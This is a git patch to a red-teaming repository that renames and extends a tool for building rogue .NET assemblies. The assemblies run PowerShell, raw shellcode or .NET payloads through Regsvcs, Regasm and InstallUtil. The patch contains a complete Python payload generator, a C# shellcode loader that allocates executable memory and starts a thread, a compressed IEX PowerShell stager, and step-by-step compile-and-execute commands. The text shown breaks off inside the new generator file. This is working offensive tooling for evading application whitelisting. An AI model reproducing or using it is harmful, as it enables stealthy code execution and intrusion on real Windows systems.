From 72c1136fda6d782dcd7291f8c66553bf21765f3d Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Tue, 5 May 2020 20:22:05 +0200 Subject: [PATCH] Updated rogue-dot-net --- red-teaming/README.md | 2 +- red-teaming/regsvcs/README.md | 78 -- red-teaming/regsvcs/regsvcs.dll | Bin 5120 -> 0 bytes red-teaming/rogue-dot-net/README.md | 90 +++ .../System.Management.Automation.dll | Bin .../{regsvcs => rogue-dot-net}/build.ps1 | 10 +- .../generateRogueDotNet.py} | 742 +++++++++--------- .../{regsvcs => rogue-dot-net}/key.snk | Bin red-teaming/rogue-dot-net/notepad64.bin | Bin 0 -> 279 bytes .../program-template.cs | Bin red-teaming/rogue-dot-net/program.cs | 141 ++++ red-teaming/rogue-dot-net/rogue.dll | Bin 0 -> 5632 bytes 12 files changed, 619 insertions(+), 444 deletions(-) delete mode 100644 red-teaming/regsvcs/README.md delete mode 100644 red-teaming/regsvcs/regsvcs.dll create mode 100644 red-teaming/rogue-dot-net/README.md rename red-teaming/{regsvcs => rogue-dot-net}/System.Management.Automation.dll (100%) rename red-teaming/{regsvcs => rogue-dot-net}/build.ps1 (99%) rename red-teaming/{regsvcs/generateRegsvcs.py => rogue-dot-net/generateRogueDotNet.py} (80%) rename red-teaming/{regsvcs => rogue-dot-net}/key.snk (100%) create mode 100644 red-teaming/rogue-dot-net/notepad64.bin rename red-teaming/{regsvcs => rogue-dot-net}/program-template.cs (100%) create mode 100644 red-teaming/rogue-dot-net/program.cs create mode 100644 red-teaming/rogue-dot-net/rogue.dll diff --git a/red-teaming/README.md b/red-teaming/README.md index 5adf385..5f49556 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML
action parameter. -- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives. +- [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives. - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. diff --git a/red-teaming/regsvcs/README.md b/red-teaming/regsvcs/README.md deleted file mode 100644 index d5f6565..0000000 --- a/red-teaming/regsvcs/README.md +++ /dev/null @@ -1,78 +0,0 @@ -## Rogue .NET Assembly for Regsvcs/Regasm Code Execution - -Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs: - -### Step 1: Generate key.snk file - -``` -powershell -file build.ps1 -``` - -### Step 2: Generate source code file - -Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. - -Usage: - -``` -python3 generateRegsvcs.py --help - - :: Regsvcs Code Execution Source code generation utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. - Mariusz B. / mgeeky, - -usage: .\generateRegsvcs.py [options] - -positional arguments: - inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. - -optional arguments: - -h, --help show this help message and exit - -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! - -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -``` - -Sample use case: - -``` -python3 generateRegsvcs.py -r notepad64.bin > program.cs - - :: Regsvcs Code Execution Source code generation utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. - Mariusz B. / mgeeky, - -[?] File specified as raw Shellcode. - -``` - - -### Step 3: Compilate library .NET Assembly - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -``` - -If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: - -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -``` - - -### Step 4: Code execution via Regsvcs or Regasm: - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll -``` diff --git a/red-teaming/regsvcs/regsvcs.dll b/red-teaming/regsvcs/regsvcs.dll deleted file mode 100644 index ab69e54ed711f8c6d23b9e68f9b5bf1c1ba1a34d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5120 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 diff --git a/red-teaming/rogue-dot-net/README.md b/red-teaming/rogue-dot-net/README.md new file mode 100644 index 0000000..1b7d9b4 --- /dev/null +++ b/red-teaming/rogue-dot-net/README.md @@ -0,0 +1,90 @@ +## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution + +Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: + +- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) +- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) +- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) + +### Step 1: Generate key.snk file + +``` +powershell -file build.ps1 +``` + +### Step 2: Generate source code file + +Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. + +Usage: + +``` +python3 generateRogueDotNet.py --help + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +usage: .\generateRogueDotNet.py [options] + +positional arguments: + inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. + +optional arguments: + -h, --help show this help message and exit + -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! + -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. +``` + +Sample use case: + +``` +python3 generateRogueDotNet.py -r notepad64.bin > program.cs + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +[?] File specified as raw Shellcode. + +``` + + +### Step 3: Compilate library .NET Assembly + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + +If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: + +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + + +### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: + +- x86: +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` + +- x64: +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` \ No newline at end of file diff --git a/red-teaming/regsvcs/System.Management.Automation.dll b/red-teaming/rogue-dot-net/System.Management.Automation.dll similarity index 100% rename from red-teaming/regsvcs/System.Management.Automation.dll rename to red-teaming/rogue-dot-net/System.Management.Automation.dll diff --git a/red-teaming/regsvcs/build.ps1 b/red-teaming/rogue-dot-net/build.ps1 similarity index 99% rename from red-teaming/regsvcs/build.ps1 rename to red-teaming/rogue-dot-net/build.ps1 index 83251b0..9277013 100644 --- a/red-teaming/regsvcs/build.ps1 +++ b/red-teaming/rogue-dot-net/build.ps1 @@ -1,5 +1,5 @@ -$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' -$Content = [System.Convert]::FromBase64String($key) -Set-Content key.snk -Value $Content -Encoding Byte - -& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' +$Content = [System.Convert]::FromBase64String($key) +Set-Content key.snk -Value $Content -Encoding Byte + +& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs diff --git a/red-teaming/regsvcs/generateRegsvcs.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py similarity index 80% rename from red-teaming/regsvcs/generateRegsvcs.py rename to red-teaming/rogue-dot-net/generateRogueDotNet.py index 60e8170..ce71b3a 100644 --- a/red-teaming/regsvcs/generateRegsvcs.py +++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py @@ -1,360 +1,382 @@ -#!/usr/bin/python3 -# -# Red-Teaming script that constructs C# code for Regsvcs code execution technique. -# -# Step 1: Generate source code file -# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs -# -# Step 2: Compilate library .NET Assembly -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -# -# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used -# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). -# Then proper compilation command will be: -# -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -# -# -# Step 3: Code execution via Regsvcs or Regasm: -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll -# -# Mariusz B. / mgeeky, -# - -import re -import os -import io -import sys -import gzip -import base64 -import string -import struct -import random -import binascii -import argparse - - -def getCompressedPayload(filePath): - out = io.BytesIO() - encoded = '' - with open(filePath, 'rb') as f: - inp = f.read() - - with gzip.GzipFile(fileobj = out, mode = 'w') as fo: - fo.write(inp) - - encoded = base64.b64encode(out.getvalue()) - - powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( - encoded.decode() - ) - return powershell - -def getSourceFileContents(payload, _format): - launchCode = '' - usings = '' - - if _format == 'exe': - - exeLaunchCode = string.Template(''' - public static void Execute() { - - string payload = "$payload2"; - byte[] decoded = System.Convert.FromBase64String(payload); - - Assembly asm = Assembly.Load(decoded); - MethodInfo method = asm.EntryPoint; - object instance = asm.CreateInstance(method.Name); - method.Invoke(instance, null); - - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - - launchCode = exeLaunchCode - - elif _format == 'raw': - - foo = str(binascii.hexlify(payload), 'ascii') - fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] - encodedPayload = ' ' - - for i in range(len(fooarr)): - if i % 16 == 0 and i > 0: - encodedPayload += '\n ' - encodedPayload += '{}, '.format(fooarr[i]) - - encodedPayload = encodedPayload.strip()[:-1] - - shellcodeLoader = string.Template(''' - [DllImport("kernel32")] - private static extern IntPtr VirtualAlloc( - IntPtr lpAddress, UIntPtr dwSize, - UInt32 flAllocationType, - UInt32 flProtect - ); - - [DllImport("kernel32")] - private static extern bool VirtualFree( - IntPtr lpAddress, - UInt32 dwSize, - UInt32 dwFreeType - ); - - [DllImport("kernel32")] - private static extern IntPtr CreateThread( - UInt32 lpThreadAttributes, - UInt32 dwStackSize, - IntPtr lpStartAddress, - IntPtr param, - UInt32 dwCreationFlags, - ref UInt32 lpThreadId - ); - - [DllImport("kernel32")] - private static extern bool CloseHandle( - IntPtr hHandle - ); - - [DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject( - IntPtr hHandle, - UInt32 dwMilliseconds - ); - - private static UInt32 MEM_COMMIT = 0x1000; - private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; - private static UInt32 MEM_RELEASE = 0x8000; - - public static void Execute() { - - byte[] payload = new byte[$payloadSize] { - $payload2 - }; - - IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - Marshal.Copy(payload, 0, funcAddr, payload.Length); - IntPtr hThread = IntPtr.Zero; - UInt32 threadId = 0; - - hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); - WaitForSingleObject(hThread, 0xFFFFFFFF); - - CloseHandle(hThread); - VirtualFree(funcAddr, 0, MEM_RELEASE); - - }''').safe_substitute( - payload2 = encodedPayload, - payloadSize = len(payload) - ) - - launchCode = shellcodeLoader - - else: - usings += ''' -using System.Management.Automation; -using System.Management.Automation.Runspaces; -''' - powershellLaunchCode = string.Template(''' - public static void Execute() { - - byte[] payload = System.Convert.FromBase64String("$payload2"); - string decoded = System.Text.Encoding.UTF8.GetString(payload); - - Runspace runspace = RunspaceFactory.CreateRunspace(); - runspace.Open(); - - Pipeline pipeline = runspace.CreatePipeline(); - pipeline.Commands.AddScript(decoded); - pipeline.Invoke(); - - runspace.Close(); - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - launchCode = powershellLaunchCode - - - template = string.Template(''' -using System; -using System.Diagnostics; -using System.Reflection; -using System.Runtime.InteropServices; -using System.EnterpriseServices; -$usings - -/* - Author: Casey Smith, Twitter: @subTee - Customized by: Mariusz B. / mgeeky, - License: BSD 3-Clause - - Step 1: Create Your Strong Name Key -> key.snk - - $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - - Step 2: Compile source code: - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs - - Step 3: Execute your payload! - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll -*/ - -namespace Program -{ - public class Bypass : ServicedComponent - { - public Bypass() - { - } - - // This executes if registration is successful - [ComRegisterFunction] - public static void RegisterClass( string key ) - { - Shellcode.Execute(); - } - - // This executes if registration fails - [ComUnregisterFunction] - public static void UnRegisterClass( string key ) - { - Shellcode.Execute(); - } - } - - public class Shellcode - { - $launchCode - } -}''').safe_substitute( - launchCode = launchCode, - usings = usings - ) - - return template - -def detectFileIsExe(filePath, forced = False): - first1000 = [] - - with open(filePath, 'rb') as f: - first1000 = f.read()[:1000] - - if not (first1000[0] == 'M' and first1000[1] == 'Z'): - return False - - elfanew = struct.unpack(' - -''') - if len(argv) < 2: - print('Usage: ./generateRegsvcs.py ') - sys.exit(-1) - - args = opts(argv) - - _format = 'powershell' - - if args.exe: - if not detectFileIsExe(args.inputFile, args.exe): - sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') - return False - - _format = 'exe' - sys.stderr.write('[?] File recognized as PE/EXE.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - elif args.raw: - _format = 'raw' - sys.stderr.write('[?] File specified as raw Shellcode.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - else: - sys.stderr.write('[?] Powershell code given.\n') - sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n') - sys.stderr.write(' Obtain them from: .\n\n') - - if args.inputFile.endswith('.exe'): - return False - - payload = getCompressedPayload(args.inputFile) - - output = getSourceFileContents(payload, _format) - - print(output) - - management = '' - if _format == 'powershell': - management = ' /r:System.Management.Automation.dll' - - commands = ''' - -===================================== - -Step 1: Create Your Strong Name Key -> key.snk - - $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - -Step 2: Compile source code: - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs - -Step 3: Execute your payload! - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll - '''.format(management) - - if 'PROGRAMFILES(X86)' in os.environ: - commands = commands.replace('Framework', 'Framework64') - - sys.stderr.write(commands) - -if __name__ == '__main__': - main(sys.argv) +#!/usr/bin/python3 +# +# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. +# +# Step 1: Generate source code file +# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs +# +# Step 2: Compilate library .NET Assembly +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used +# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). +# Then proper compilation command will 